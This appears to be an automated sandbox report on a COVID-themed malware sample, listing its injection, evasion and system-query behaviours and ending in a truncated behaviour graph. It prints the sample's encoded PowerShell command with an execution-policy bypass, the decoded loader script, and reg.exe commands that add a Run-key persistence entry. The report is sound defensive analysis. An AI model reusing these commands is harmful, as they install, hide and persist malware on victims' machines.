Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D67CB8 SetUnhandledExceptionFilter,_invalid_parameter_noinfo, 29_2_00007FF7E3D67CB8
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D68210 SetUnhandledExceptionFilter, 29_2_00007FF7E3D68210
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D68064 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 29_2_00007FF7E3D68064
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D6FEC8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 29_2_00007FF7E3D6FEC8
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 29_2_00007FF7E3D67694 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 29_2_00007FF7E3D67694
Source: C:\Users\user\Desktop\covid.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Early bird code injection technique detected
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Process created / APC Queued / Resumed: C:\Windows\System32\mobsync.exe
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Process created / APC Queued / Resumed: C:\Windows\System32\mobsync.exe
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Process created / APC Queued / Resumed: C:\Windows\System32\mobsync.exe
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Process created / APC Queued / Resumed: C:\Windows\System32\mobsync.exe
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Memory allocated: C:\Windows\System32\mobsync.exe base: 23A00BA0000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Memory allocated: C:\Windows\System32\mobsync.exe base: 23F81490000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Memory allocated: C:\Windows\System32\mobsync.exe base: 1B3CD5A0000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Memory allocated: C:\Windows\System32\mobsync.exe base: 2212C2E0000 protect: page execute and read and write
Bypasses PowerShell execution policy
Source: C:\Users\user\Desktop\covid.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\system32\windowspowershell\v1.0\powershell.exe' -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA4ADMAOABjADYAMwA5ADcALQBhAGEANgBhAC0ANABjADIAZQAtAGEAZgAxADgALQAwADEAOABjADgAOAAwAGMAMwAzAGIAYgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABoAGEAcgBkAHoAXABEAGUAcwBrAHQAbwBwAFwAYwBvAHYAaQBkAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARgBvAHIAZQAgAFIAZQBkACAADQAKAH0A
Encrypted powershell cmdline option found
Source: C:\Users\user\Desktop\covid.exe Process created: Base64 decoded $x='838c6397-aa6a-4c2e-af18-018c880c33bb';$y='C:\Users\hardz\Desktop\covid.exe';try { if ([Environment]::Version.Major -ge 4) { $null = [Reflection.Assembly]::UnsafeLoadFrom($y) } else { $null = [Reflection.Assembly]::LoadFile($y)} . ([_32._88]::_74($x)) exit $LASTEXITCODE} catch [NotSupportedException]{ Write-Host 'Application location is untrusted. Copy file to a local drive, and try again.' -ForegroundColor Red}catch { Write-Host ("Error: " + $_.Exception.Message) -Fore Red }
Source: C:\Users\user\Desktop\covid.exe Process created: Base64 decoded $x='838c6397-aa6a-4c2e-af18-018c880c33bb';$y='C:\Users\hardz\Desktop\covid.exe';try { if ([Environment]::Version.Major -ge 4) { $null = [Reflection.Assembly]::UnsafeLoadFrom($y) } else { $null = [Reflection.Assembly]::LoadFile($y)} . ([_32._88]::_74($x)) exit $LASTEXITCODE} catch [NotSupportedException]{ Write-Host 'Application location is untrusted. Copy file to a local drive, and try again.' -ForegroundColor Red}catch { Write-Host ("Error: " + $_.Exception.Message) -Fore Red } Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Thread APC queued: target process: C:\Windows\System32\mobsync.exe
Writes to foreign memory regions
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Memory written: C:\Windows\System32\mobsync.exe base: 23A00BA0000
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Memory written: C:\Windows\System32\mobsync.exe base: 23A00BA0000
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Memory written: C:\Windows\System32\mobsync.exe base: 23F81490000
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Memory written: C:\Windows\System32\mobsync.exe base: 23F81490000
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Memory written: C:\Windows\System32\mobsync.exe base: 1B3CD5A0000
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Memory written: C:\Windows\System32\mobsync.exe base: 1B3CD5A0000
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Memory written: C:\Windows\System32\mobsync.exe base: 2212C2E0000
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Memory written: C:\Windows\System32\mobsync.exe base: 2212C2E0000
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\covid.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\system32\windowspowershell\v1.0\powershell.exe' -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA4ADMAOABjADYAMwA5ADcALQBhAGEANgBhAC0ANABjADIAZQAtAGEAZgAxADgALQAwADEAOABjADgAOAAwAGMAMwAzAGIAYgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABoAGEAcgBkAHoAXABEAGUAcwBrAHQAbwBwAFwAYwBvAHYAaQBkAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARgBvAHIAZQAgAFIAZQBkACAADQAKAH0A Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://www.who.int/ Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\reg.exe 'C:\Windows\system32\reg.exe' add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v PromoJohn /t REG_SZ /d C:\Users\user\AppData\Roaming\buyonegetone.exe /f Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\reg.exe 'C:\Windows\system32\reg.exe' add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v PromoJohn /t REG_SZ /d C:\Users\user\AppData\Roaming\buyonegetone.exe /f Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\buyonegetone.exe 'C:\Users\user\AppData\Roaming\buyonegetone.exe' Jump to behavior
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Process created: C:\Windows\System32\mobsync.exe C:\Windows\System32\mobsync.exe
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Process created: C:\Windows\System32\mobsync.exe C:\Windows\System32\mobsync.exe
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Process created: C:\Windows\System32\mobsync.exe C:\Windows\System32\mobsync.exe
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Process created: C:\Windows\System32\mobsync.exe C:\Windows\System32\mobsync.exe
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\user\Desktop\covid.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\system32\windowspowershell\v1.0\powershell.exe' -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA4ADMAOABjADYAMwA5ADcALQBhAGEANgBhAC0ANABjADIAZQAtAGEAZgAxADgALQAwADEAOABjADgAOAAwAGMAMwAzAGIAYgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABoAGEAcgBkAHoAXABEAGUAcwBrAHQAbwBwAFwAYwBvAHYAaQBkAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARgBvAHIAZQAgAFIAZQBkACAADQAKAH0A
Source: C:\Users\user\Desktop\covid.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\system32\windowspowershell\v1.0\powershell.exe' -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA4ADMAOABjADYAMwA5ADcALQBhAGEANgBhAC0ANABjADIAZQAtAGEAZgAxADgALQAwADEAOABjADgAOAAwAGMAMwAzAGIAYgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABoAGEAcgBkAHoAXABEAGUAcwBrAHQAbwBwAFwAYwBvAHYAaQBkAC4AZQB4AGUAJwA7AHQAcgB5ACAAewANAAoAIAAgAGkAZgAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAANAApAA0ACgAgACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAVQBuAHMAYQBmAGUATABvAGEAZABGAHIAbwBtACgAJAB5ACkAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQARgBpAGwAZQAoACQAeQApAH0ADQAKACAAIAAuACAAKABbAF8AMwAyAC4AXwA4ADgAXQA6ADoAXwA3ADQAKAAkAHgAKQApAA0ACgAgACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUADQAKAH0AIAANAAoAYwBhAHQAYwBoACAAWwBOAG8AdABTAHUAcABwAG8AcgB0AGUAZABFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACcAQQBwAHAAbABpAGMAYQB0AGkAbwBuACAAbABvAGMAYQB0AGkAbwBuACAAaQBzACAAdQBuAHQAcgB1AHMAdABlAGQALgAgAEMAbwBwAHkAIABmAGkAbABlACAAdABvACAAYQAgAGwAbwBjAGEAbAAgAGQAcgBpAHYAZQAsACAAYQBuAGQAIAB0AHIAeQAgAGEAZwBhAGkAbgAuACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQADQAKAH0ADQAKAGMAYQB0AGMAaAAgAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAKAAiAEUAcgByAG8AcgA6ACAAIgAgACsAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAKQAgAC0ARgBvAHIAZQAgAFIAZQBkACAADQAKAH0A Jump to behavior

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF686065C70 cpuid 13_2_00007FF686065C70
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 13_2_00007FF686061F44
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: EnumSystemLocalesW, 13_2_00007FF686061DDC
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: EnumSystemLocalesW, 13_2_00007FF686061EAC
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: try_get_function,GetLocaleInfoW, 13_2_00007FF68605EF2C
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: GetLocaleInfoW, 13_2_00007FF686062398
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 13_2_00007FF6860624C4
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: GetLocaleInfoW, 13_2_00007FF686062190
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: EnumSystemLocalesW, 13_2_00007FF68605E9AC
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW, 13_2_00007FF686061A90
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 13_2_00007FF6860622E8
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 18_2_00007FF6FE121F44
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: EnumSystemLocalesW, 18_2_00007FF6FE121DDC
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: EnumSystemLocalesW, 18_2_00007FF6FE121EAC
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: try_get_function,GetLocaleInfoW, 18_2_00007FF6FE11EF2C
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: GetLocaleInfoW, 18_2_00007FF6FE122398
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 18_2_00007FF6FE1224C4
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: EnumSystemLocalesW, 18_2_00007FF6FE11E9AC
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: GetLocaleInfoW, 18_2_00007FF6FE122190
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW, 18_2_00007FF6FE121A90
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 18_2_00007FF6FE1222E8
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 29_2_00007FF7E3D824C4
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: GetLocaleInfoW, 29_2_00007FF7E3D82398
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 29_2_00007FF7E3D822E8
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW, 29_2_00007FF7E3D81A90
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: EnumSystemLocalesW, 29_2_00007FF7E3D7E9AC
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: GetLocaleInfoW, 29_2_00007FF7E3D82190
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 29_2_00007FF7E3D81F44
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: try_get_function,GetLocaleInfoW, 29_2_00007FF7E3D7EF2C
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: EnumSystemLocalesW, 29_2_00007FF7E3D81EAC
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: EnumSystemLocalesW, 29_2_00007FF7E3D81DDC
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\covid.exe Queries volume information: C:\Users\user\Desktop\covid.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Users\user\Desktop\covid.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\buyonegetone.exe Code function: 13_2_00007FF686048288 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 13_2_00007FF686048288
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 379751 Sample: covid.exe Startdate: 01/04/2021 Architecture: WINDOWS Score: 100 82 Antivirus / Scanner detection for submitted sample 2->82 84 Multi AV Scanner detection for submitted file 2->84 86 Potential dropper URLs found in powershell memory 2->86 88 2 other signatures 2->88 9 covid.exe 2 2->9         started        13 buyonegetone.exe 2->13         started        15 buyonegetone.exe 2->15         started        17 buyonegetone.exe 2->17         started        process3 file4 64 C:\Users\user\AppData\Local\...\covid.exe.log, ASCII 9->64 dropped 102 Malicious encrypted Powershell command line found 9->102 104 Encrypted powershell cmdline option found 9->104 106 Bypasses PowerShell execution policy 9->106 19 powershell.exe 1 36 9->19         started        108 Early bird code injection technique detected 13->108 110 Writes to foreign memory regions 13->110 112 Allocates memory in foreign processes 13->112 23 mobsync.exe 13->23         started        25 conhost.exe 13->25         started        27 mobsync.exe 15->27         started        29 conhost.exe 15->29         started        31 mobsync.exe 17->31         started        34 conhost.exe 17->34         started        signatures5 process6 dnsIp7 60 C:\Users\user\AppData\...\buyonegetone.exe, PE32+ 19->60 dropped 62 PowerShell_transcr....20210401080426.txt, UTF-8 19->62 dropped 90 Uses cmd line tools excessively to alter registry or file data 19->90 92 Powershell drops PE file 19->92 36 buyonegetone.exe 19->36         started        39 iexplore.exe 6 85 19->39         started        42 conhost.exe 19->42         started        48 2 other processes 19->48 44 WerFault.exe 23->44         started        46 WerFault.exe 27->46         started        80 